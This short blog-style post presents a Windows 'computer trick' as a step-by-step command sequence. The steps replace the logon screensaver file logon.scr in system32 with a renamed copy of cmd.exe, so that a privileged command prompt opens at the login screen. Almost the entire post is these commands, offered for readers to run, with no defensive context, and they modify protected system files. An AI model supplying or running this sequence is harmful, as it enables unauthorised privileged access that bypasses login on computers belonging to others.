Picture
This is a cool little computer trick for Microsoft Windows trick I’ve picked up in my travels and decided to share it with you fine and ethical individuals =). Log in and go to your DOS command prompt and enter these commands exactly:

cd\
cd\windows\system32
mkdir temphack
Copy logon.scr temphack\logon.scr
Copy cmd.exe temphack\cmd.exe
Del logon.scr
Rename cmd.exe logon.scr
Exit